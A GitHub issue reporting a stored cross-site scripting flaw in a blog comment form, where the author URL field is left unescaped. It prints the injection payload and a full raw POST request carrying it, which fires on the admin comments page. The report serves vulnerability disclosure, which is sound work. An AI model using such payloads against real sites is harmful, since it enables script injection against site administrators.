Skip to content

These is Another stored xss vulnerability #127

Closed
@Artemis1029

Description

@Artemis1029

我确定我已经查看了 (标注[ ][x])


我要申请 (标注[ ][x])

  • BUG 反馈
  • 添加新的特性或者功能
  • 请求技术支持

Bug Report

I find that You have do HtmlUtil.escape for CommentContent
图片
but do nothing with CommentAuthorUrl
图片

payload:commentAuthorUrl="><img src=1 onerror=alert(123)>
图片

POST /newComment HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 306
Connection: close
Cookie: JSESSIONID=
X-Forwarded-For: 127.0.0.2

postId=3&commentContent=sasas&commentAuthor=as12%22%3E%3Ca%3E3&commentAuthorEmail=&commentAuthorUrl=%22%3E%3Cimg+src%3D1+onerror%3Dalert(123)%3E233&commentAgent=Mozilla%2F5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F73.0.3683.47+Safari%2F537.36&commentParent=28

in uri /admin/comments?status=1
图片

Metadata

Metadata

Assignees

No one assigned

    Labels

    kind/bugCategorizes issue or PR as related to a bug.vulnerabilityVulnerability

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions